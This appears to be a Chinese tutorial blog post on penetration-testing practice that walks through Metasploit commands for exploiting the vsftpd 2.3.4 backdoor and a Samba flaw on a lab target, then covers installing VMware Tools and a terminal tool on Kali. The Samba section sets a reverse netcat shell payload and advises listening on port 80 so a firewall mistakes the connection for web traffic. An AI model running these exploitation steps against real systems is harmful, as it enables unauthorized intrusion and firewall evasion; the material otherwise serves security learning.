FTP后门命令执行

再次声明,最近听闻不得教受工具使用等言论。

我敢打包票,网络空间安全一级学科的老师和学生是不会说这句话的。未知攻,焉知防。

有工具来检测自己和玩弄它,是幸运的。

犯罪者不会给你提供任何的漏洞利用工具让你玩弄。

他们的工具里面包含的漏洞是自己研发出来的。

因此,您所有看得见的工具都是用于安全的学习和培养安全性人才而使用的,是最低级别的技术。

如果这样的工具和教程都能够对公司和国家构成危害的话,那么犯罪者就更加的可以肆无忌惮的发布攻击。

我们的工具学习和掌握如同在学小学一年级,犯罪者使用的工具是大学级别。

工具都不让发布和用于教学,还谈什么国家安全,拿什么认知和技能去防御真正的攻击。

metasploit是rapid7开发的 www.rapid7.com

它是一个大型漏洞利用数据库,可以创造属于自己的漏洞

为了安全性检测,利用它和修补漏洞

parrot:msfconsole

help

use    show    set    exploit

谷歌 rapid7 进入 vulnerability & Exploit Database   查询 VSFTPD v2.3.4 Backdoor Command Execution

use 复制粘贴模块名字

show options

set RHOST 靶机IP

show options

exploit

uname -r    uname -a    ls

Samba命令执行

谷歌 rapid7 进入 vulnerability & Exploit Database 查询到zenmap对应的samba模块 获取模块的信息

samba服务器运行它没有后门

唯一的方式是利用缓冲区溢出,使用有效载荷

use 复制粘贴模块名字

options

set RHOST 靶机ip

clear

show payloads

选择 cmd/unix/reverse_netcat 复制

set payload 复制粘贴

options

设置自己的监听端口为80,靶机访问80端口防火墙会认为它在访问网站,让可疑程度降低

如果反向连接出来的端口是一个奇怪的数字,防火墙会阻止这个连接,说这个可疑

set LHOST 本机IP

exploit

uname -a    ls    cd /root    ls    cat vnc.log

VMware安装kali

pureVPN赞助

从桌面光盘进去把VMware Tools拿到桌面解压 进去后右键运行终端

perl vmware-install.pl

一切配置默认,注销后生效

多终端显示

apt-get install terminator

打开terminator

top

namp

右键选择垂直分开

多终端显示

8.FTP后门命令执行----Samba命令执行----VMware安装kali----多终端显示的更多相关文章

  1. 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时

    使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...

  2. salt常用命令、模块、执行

    一.salt常用命令 salt 该命令执行salt的执行模块,通常在master端运行,也是我们最常用到的命令 salt [options] '<target>' <function ...

  3. [转帖]linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令

    linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令 https://binwaer.com/post/12.html yun install -y screen ...

  4. 渗透技巧——如何逃逸Linux的受限制shell执行任意命令

    导语:本文介绍了如何在受限制的shell中执行任意命令,实现交互.其相应的利用场景是说当我们通过一些手段拿到当前Linux机器的shell时,由于当前shell的限制,很多命令不能执行,导致后续的渗透 ...

  5. ansible使用临时命令通过模块来执行任务

    使用临时命令通过模块来执行任务 一.查看系统上安装的所有模块 ansible-doc -l 查看ping模块帮助文档 ansible-doc ping 1.ansible模块 文件模块: copy:将 ...

  6. 【每日一linux命令2】命令执行顺序:

    二.命令顺序:     若在 shell 内置的命令/bin 以及/usr/bin 之下都出现了命令 pwd,那当我们执行该命令时,会执行哪 一个?答案是第一优先执行 shell 内置的命令,再执行路 ...

  7. 在程序中执行shell命令

    在linux系统下的操作中我们会经常用到shell命令来进行,一开始学习进程的时候对于shell命令也进行了思考,认为shell命令就是一个进程的外壳,经过了后来的学习对于这一点也有了更多的认识. 用 ...

  8. Linux远程执行Shell命令或脚本

    ## 远程执行shell命令 ssh [user]@[server] '[command]' # eg. ssh root@192.168.1.1 'uptime' ## 远程执行本地shell脚本 ...

  9. 解决idea中执行maven命令失败的问题

    1.问题描述 如上图所示,在使用idea 里的maven命令执行项目打包时,有时候会报如下一个错误. -Dmaven.multiModuleProjectDirectory system proper ...

随机推荐

  1. php随机获取数组里面的值

    srand() 函数播下随机数发生器种子,array_rand() 函数从数组中随机选出一个或多个元素,并返回.第二个参数用来确定要选出几个元素.如果选出的元素不止一个,则返回包含随机键名的数组,否则 ...

  2. Codeforces 967 贪心服务器分配资源 线性基XOR递增序列构造

    A #include<bits/stdc++.h> using namespace std; ][] = {{, -}, {, }, { -, }, {, }}; typedef long ...

  3. Notepad++技巧

    1 正则表达式的查找和替换,例如删除每行开始的数字ctrl+H, ^\d\d\d:null 2 删除所有的空行: TextFX插件->Edit->Delete Blank Lines 3 ...

  4. java基础语法2-运算符与流程控制

    关键字-标识符-常量和变量-运算符-流程控制-方法-数组 5 运算符 算术运算符Arithmetic Operators 赋值运算符Assignment Operators 比较运算符Compare ...

  5. 【NOIP2016提高A组模拟8.17】(雅礼联考day1)Binary

    题目 分析 首先每个数对\(2^i\)取模.也就是把每个数的第i位以后删去. 把它们放进树状数组里面. 那么当查询操作, 答案就位于区间\([2^i-x,2^{i-1}-1-x]\)中,直接查询就可以 ...

  6. Ubuntu下安装CUDA8.0及nvidia驱动

    参考:https://blog.csdn.net/qq_35379989/article/details/80147630 cuda的历史版本下载地址:https://developer.nvidia ...

  7. HTML5测试(二)

    HTML5测试(四) 1.input 元素中,下列哪个类型属性定义了输入电话号码的控件? A.mob B.tel C.mobile D.telephone 答案:B 具有 type 属性的 input ...

  8. vue中为computed计算属性传参遇到的问题,已解决

    首先介绍下项目背景, 需要将 dataList 中的 item.stars 属性传入 computed 返回要展示的值 部分代码如下(请不要纠结为什么这么做,数据格式确认如此): <li cla ...

  9. js怎么上传文件夹

    1 背景 用户本地有一份txt或者csv文件,无论是从业务数据库导出.还是其他途径获取,当需要使用蚂蚁的大数据分析工具进行数据加工.挖掘和共创应用的时候,首先要将本地文件上传至ODPS,普通的小文件通 ...

  10. sh_06_函数的返回值

    sh_06_函数的返回值 def sum_2_num(num1, num2): """对两个数字的求和""" result = num1 + ...